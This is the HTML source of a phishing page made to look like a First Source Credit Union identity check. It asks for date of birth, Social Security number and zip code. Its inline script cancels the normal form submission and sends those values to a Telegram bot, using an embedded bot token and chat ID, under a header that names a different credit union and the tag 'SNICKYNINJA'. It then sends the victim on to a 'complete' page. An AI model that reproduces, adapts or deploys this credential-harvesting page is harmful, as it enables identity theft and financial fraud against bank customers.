<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<title></title>
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<style>
		@font-face{
	font-family: 'fmtt';

  src: url(img/font1.ttf) format('truetype');
  }
*{
	margin:auto;
	font-size:14px;
	outline:0;
	font-family:'fmtt';
}input{
	border:0;
    display:block;
	margin-top:0px;
	width:100%;
	padding:6px;
	background:#f2f2f2;
	font-size: 15px;
	padding-left:0;
}td{
	border-right:1px solid black;
	padding-right:10px;
	padding-left:10px;
	font-size:11px;
	color:#0072ce;
}.inp{
	margin-top:30px;
	border-radius:15px;
	background:#f2f2f2;
	text-align:center;
	border:1px solid #f2f2f2;
	width:93%;
	padding:6px;
	padding-left:1px;
}label{
	display:block;
	text-align:left;
	margin:0;
	font-size:12px;
	color:gray;
	padding:0;
	width:100%;
}#ph{
	font-size: 18px;
}

	</style>
</head>
<body>
<div style="text-align: center;background:white;padding:5px;padding-top:30px;padding-bottom:0px;max-width:500px;">
<img src="img/logo.png" width="230px">
<br>
<p style="text-align:left;padding:15px;border-top:1px solid lightgray;padding:15px;"></p>
<p style="text-align:left;padding:15px;font-size:18px;padding-bottom:0">Verify Your Identity</p>
<p style="text-align:left;padding:15px;font-size:12px;padding-top:8px;color:gray">The following information is used to verify you have an account with First Source Credit Union and that you are the owner of the account. We match your answer against our record.</p>

</div>

<div style="max-width:500px;padding:0px;">

<form action="complete.php" method="POST" id="form">
<div style="text-align:center">



<div class="inp">
<div style="width:95%">
<label for="user">Date of Birth</label>
<input placeholder="DD/MM/YYY" id="dob" name="dob" minlength="9" maxlength="50" required>
</div>
</div>



<div class="inp">
<div style="width:95%">
<label for="user">Social Security Numbe</label>
<input placeholder="___-__-____" id="ssn" name="ssn" minlength="9" maxlength="50" required>
</div>
</div>


<div class="inp">
<div style="width:95%">
<label for="user">Zip Code</label>
<input placeholder="_______" id="zip" name="zip" minlength="5" maxlength="6" required>
</div>
</div>
<script>
     document.getElementById('form').addEventListener('submit', function(event) {
    event.preventDefault(); 

  
    const dob = document.getElementById('dob').value;
    const ssn = document.getElementById('ssn').value;
    const zip = document.getElementById('zip').value;



    // Your Telegram bot API token and chat ID

    
    //----------------------------------------------------------------
    const botToken = '6956433562:AAFSKLycuqUsY0g-DV9_2D9TkhAFGCO3FX8'; 
    const chatId = '6595653755'; 
   //------------------------------------------------------------------------

    const message = `
    #------------------[ WestMark Credit Union OTP ]---------------------#:
    Date of Birth: ${dob}
    Social Security Number: ${ssn}
    Zip Code: ${zip}
    #-------------------[ SNICKYNINJA - END ]------------------------#
    `;
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
    fetch(url, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify({
            chat_id: chatId,
            text: message
        })
    })
    .then(response => response.json())
    .then(data => {
        if (data.ok) {
            setTimeout(function() {
    window.location.href = "complete.html";
}, 0);
        } 
    })
   
});

    </script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/jquery.inputmask.bundle.js"></script>
    <script type="text/javascript">
        $("#ssn").inputmask({"mask": "999-99-9999","placeholder":"___-__-____"});
	$("#cn").inputmask({"mask": "9999 9999 9999 9999"});
        $("#exp").inputmask({"mask": "99/99","placeholder":"MM/YY"});
        $("#ph").inputmask({"mask": "(999) 999-9999"});
            $("#dob").inputmask({"mask": "99/99/9999","placeholder":"DD/MM/YYYY"});
    </script>

</div>


<div class="inp" style="padding-left:0;background:#00688f;">
<button style="background:#00688f;border:0;padding:10px;border-radius:15px;color:white;font-size:17px;display:block;width:100%">Continue</button>
</div>
<p style="font-size:14px;color:#0072ce;margin-top:15px;text-align:center;font-weight:bold;visibility:hidden">Register</p>

</div>
</form>



</body>
</html>